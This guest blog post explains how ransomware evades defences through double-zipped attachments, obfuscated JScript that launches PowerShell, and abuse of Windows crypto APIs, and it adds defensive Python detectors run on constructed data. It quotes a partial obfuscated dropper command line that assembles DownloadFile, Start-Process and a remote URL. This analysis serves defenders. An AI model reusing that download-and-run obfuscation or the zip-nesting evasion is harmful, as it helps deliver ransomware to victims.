Guest post by Allan Liska and Timothy Gallo
Ransomware comes in many forms. One strategy commonly used in ransomware attacks is to cloak malicious actions inside legitimate-looking programs and features. This lets the ransomware slip past existing security defenses and avoid detection. Three common techniques are described below.
Double zipping is an increasingly common technique, most recently used in the latest Sage ransomware campaign. The premise is simple: the attacker hides the launcher, which will pull down the ransomware, in a zip file that is itself embedded inside another zip file. The outer zip is sent as an e-mail attachment; when the victim opens it, all they find is another zip file. Only when that second zip file is uncompressed is the malicious payload presented to the victim.
The purpose of the double zip is to evade systems that inspect the contents of zipped attachments. Most of these controls only look one level deep: the tool intercepts the attachment, decompresses it, sees that the uncompressed file (another archive) is not itself malicious, and lets the attachment through to the victim.
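To make the one-level-deep problem concrete, here is an added example in Python (not code from the authors or from Minerva) that builds a constructed double zip in memory, shows what a single-level scanner sees, and then walks every nesting level. The file names and the one-line script inside are made up for the example; the depth and size caps are there because a hostile archive can also be built to exhaust the scanner, and a password-protected inner member cannot be inspected at all, so it is reported rather than silently skipped.

```python
import io
import os
import zipfile

# Extensions that should never arrive unannounced in an e-mail attachment.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".exe", ".scr", ".ps1", ".cmd", ".bat"}


def build_double_zip():
    """Construct a two-level zip in memory: outer.zip -> inner.zip -> JScript launcher.
    File names and script contents are made up for this example."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice_0117.js", 'var vuglid = "power" + "shell";\n')
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice_0117.zip", inner.getvalue())
    return outer.getvalue()


def single_level_names(data):
    """What a gateway that only looks one level deep sees: just another zip."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.namelist()


def walk_archive(data, max_depth=4, max_member_bytes=50 * 1024 * 1024, _depth=0, _prefix=""):
    """Yield (path, depth, encrypted, payload) for every non-archive member, descending into
    nested zips. Depth and size caps stop a hostile archive from exhausting the scanner."""
    if _depth > max_depth:
        raise ValueError(f"nesting deeper than {max_depth} at {_prefix}")
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            if info.file_size > max_member_bytes:
                raise ValueError(f"member {info.filename} too large ({info.file_size} bytes)")
            path = _prefix + info.filename
            # General-purpose flag bit 0 marks an encrypted member; we cannot look inside it.
            if info.flag_bits & 0x1:
                yield path, _depth, True, b""
                continue
            payload = z.read(info)
            if zipfile.is_zipfile(io.BytesIO(payload)):
                yield from walk_archive(payload, max_depth, max_member_bytes, _depth + 1, path + "/")
            else:
                yield path, _depth, False, payload


def suspicious_members(data):
    """Return (path, depth, reason) for members a mail gateway should block or quarantine."""
    hits = []
    for path, depth, encrypted, _payload in walk_archive(data):
        if encrypted:
            hits.append((path, depth, "password-protected member cannot be inspected"))
            continue
        ext = os.path.splitext(path)[1].lower()
        if ext in SCRIPT_EXTENSIONS:
            hits.append((path, depth, f"script or executable {ext} nested {depth} level(s) deep"))
    return hits


if __name__ == "__main__":
    sample = build_double_zip()
    print("single level sees:", single_level_names(sample))
    print("recursive walk flags:", suspicious_members(sample))
```

`single_level_names` returns only `invoice_0117.zip`, which is exactly the harmless-looking result the gateway acts on; `suspicious_members` descends one more level and finds the `.js` launcher. The same walk handles three or four levels of nesting, which is why the depth cap matters.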
var uxqetefem = "run";
var ujepnehu = typeof window;
var ezqusa = undefined;
var vuglid = "power" + "shell";
var araze = 0;
This part of the script defines the variable vuglid as powershell by concatenating two harmless strings, so the word never appears as a literal that a simple content filter could match. Later in the script the variable is used to build the command line:
var uphucnez = "cmd.exe /c \"" + vuglid + " $eplir='^System.Net.';$wwopu='^
Process; $';$ijwirl='^top/user.ph';$ahvetu='^rt-Process ';$mhipmac='^New-Object ';$hjuzxop='^p?f=0.dat'',';$cquza='^temp+''\ejma';$ocofdo='^$path';$eradq='^e(''http://f';$vwekehn='^pass -Scope';$mivcad='^DownloadFil';$qjizych='^$path);
Of course, cmd.exe and powershell.exe are legitimate, signed Windows binaries, so most security tools allow them to run without scrutinizing what they were asked to do. The keywords a filter might look for, such as DownloadFile or Start-Process, are also split across variables and only reassembled at run time. This is why traditional signature-based security tools are not effective at detecting these types of attacks.
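What does remain visible is the lineage: a script host spawns cmd.exe, which spawns powershell.exe with a command line made of many short string fragments. The following added example (Python, not the authors' or Minerva's code) runs that check over constructed process-creation events whose fields are modelled on what Sysmon Event ID 1 or an EDR agent records. The PIDs, paths and the fragment names are made up; the fragments echo the shape of the script quoted above, and the carets are absent from the powershell.exe command line because cmd.exe consumes them as escape characters before PowerShell ever sees them.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (fields modelled on Sysmon Event ID 1 / EDR process logs)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample events, not a real capture.
EVENTS = [
    ProcEvent(4012, 812, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(5120, 4012, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\victim\AppData\Local\Temp\invoice_0117.js"'),
    ProcEvent(5188, 5120, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c \"powershell $eplir='^System.Net.';$wwopu='^Process; $';$ijwirl='^top/user.ph';"
              "$ahvetu='^rt-Process ';$mhipmac='^New-Object ';$mivcad='^DownloadFil'\""),
    ProcEvent(5204, 5188, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell $eplir='System.Net.';$wwopu='Process; $';$ijwirl='top/user.ph';"
              "$ahvetu='rt-Process ';$mhipmac='New-Object ';$mivcad='DownloadFil'"),
    # An administrator running PowerShell from a console: same binaries, benign chain.
    ProcEvent(6100, 4012, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(6120, 6100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Get-Service -Name WinDefend"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe", "outlook.exe"}
# A short single-quoted string assigned to a variable, e.g. $mivcad='DownloadFil'. Obfuscators
# that split keywords across variables produce many of these in a single command line.
FRAGMENT_RE = re.compile(r"\$\w+\s*=\s*'[^']{1,16}'")


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Walk parent links upward from pid; returns [child, parent, grandparent, ...]."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def flag_powershell_launches(events, min_fragments=5):
    """Return {pid: [reasons]} for powershell.exe processes whose lineage or command line is suspect."""
    findings = {}
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        names = [basename(p.image) for p in ancestry(events, e.pid)]
        reasons = []
        hosts = [n for n in names[1:] if n in SCRIPT_HOSTS]
        if hosts:
            reasons.append("launched via script host " + hosts[0] + " (" + " <- ".join(names) + ")")
        fragments = FRAGMENT_RE.findall(e.cmdline)
        if len(fragments) >= min_fragments:
            reasons.append(f"{len(fragments)} short string fragments in command line")
        if reasons:
            findings[e.pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in flag_powershell_launches(EVENTS).items():
        print(pid, reasons)
```

Only PID 5204 is flagged, on both counts; the administrator's `powershell Get-Service` launched from a console is left alone even though it uses the identical binaries. Neither signal depends on seeing the word DownloadFile intact.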
Most people aren't aware of this, but ransomware families generally don't ship their own cryptographic libraries; that would make the malware larger, more cumbersome and less likely to install correctly. Instead, most ransomware uses the cryptographic libraries built into Windows (the Windows CryptoAPI) and lets the victim's own system do the hard work of encrypting all those files.
Once again, calls to the Windows crypto libraries are normal: legitimate programs make them through the Windows API all the time. What legitimate programs don't do is use those APIs to overwrite hundreds of user files in rapid succession. While this behavior may go undetected by an anti-virus product that only inspects the file on disk, a behavior-based detection solution such as Minerva can tell the difference between normal and malicious behavior, even when both use standard Windows calls.
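The distinction is one of rate and content rather than of API: one process rewriting many distinct files with ciphertext-like data in a few seconds. The added example below (Python, written for this page and not the authors' or Minerva's detection logic) applies that heuristic to constructed file-write telemetry. The process names, paths and the ciphertext stand-in are made up; `bytes(range(256))` is used in place of real encrypted output because its entropy is exactly 8 bits per byte, which makes the check deterministic.

```python
import math
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass
class FileWrite:
    """One file-write event: who wrote, where, and the first bytes of what was written."""
    ts: float
    pid: int
    image: str
    path: str
    head: bytes


def shannon_entropy(data):
    """Bits per byte, 0.0 to 8.0. Ciphertext sits near 8; text and most documents far lower."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def flag_encryption_bursts(events, window_s=5.0, min_files=20, min_entropy=7.0):
    """Flag any process that overwrites at least `min_files` distinct files with high-entropy
    content inside a sliding window of `window_s` seconds. Returns {pid: (image, files_at_trigger)}."""
    recent = defaultdict(deque)  # pid -> (ts, path) of recent high-entropy writes
    flagged = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if shannon_entropy(ev.head) < min_entropy:
            continue  # plaintext-looking write: ignore
        q = recent[ev.pid]
        q.append((ev.ts, ev.path))
        while q and ev.ts - q[0][0] > window_s:
            q.popleft()
        distinct = {p for _, p in q}
        if len(distinct) >= min_files and ev.pid not in flagged:
            flagged[ev.pid] = (ev.image, len(distinct))
    return flagged


# Constructed sample telemetry. CIPHERTEXT stands in for encrypted output: every byte value
# appears equally often, so its entropy is exactly 8.0 regardless of what produced it.
CIPHERTEXT = bytes(range(256))
PLAINTEXT = b"Meeting notes for Tuesday: action items and owners are listed below.\n"
RANSOMWARE = r"C:\Users\victim\AppData\Local\Temp\payload.exe"
BACKUP = r"C:\Program Files\BackupTool\backup.exe"
EXPLORER = r"C:\Windows\explorer.exe"

SAMPLE_EVENTS = (
    # 30 user documents rewritten with ciphertext in three seconds.
    [FileWrite(100.0 + i * 0.1, 7788, RANSOMWARE, rf"C:\Users\victim\Documents\report{i}.docx.locked", CIPHERTEXT)
     for i in range(30)]
    # A backup tool writing a handful of compressed (high-entropy) archives: legitimate.
    + [FileWrite(100.0 + i * 0.5, 3100, BACKUP, rf"D:\Backups\set{i}.bak", CIPHERTEXT) for i in range(5)]
    # Explorer saving many plaintext files quickly: many files, but nothing looks encrypted.
    + [FileWrite(100.0 + i * 0.05, 4012, EXPLORER, rf"C:\Users\victim\Documents\note{i}.txt", PLAINTEXT)
       for i in range(25)]
)


if __name__ == "__main__":
    for pid, (image, count) in flag_encryption_bursts(SAMPLE_EVENTS).items():
        print(f"pid {pid} ({image}) rewrote {count} files with high-entropy data in one window")
```

Only the process writing thirty ciphertext-like files is flagged, and it is flagged at the twentieth file, well before the run finishes. The backup tool's output is just as high-entropy, which is why entropy alone is not enough and the distinct-file rate is the deciding factor; compressed formats such as images and archives look the same way. Production logic would also weigh renames to a new extension and deletion of the originals or of shadow copies, which this example leaves out.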
Nowadays, malware developers take advantage of legitimate system features to cloak malware and remain undetected. Identifying such attacks is difficult because it is hard to distinguish the legitimate use of those features from the malware's abuse of them.
This type of malware behavior emphasizes the need to prevent infection in the first place, rather than investing time in expensive and complex hunting and remediation after the fact.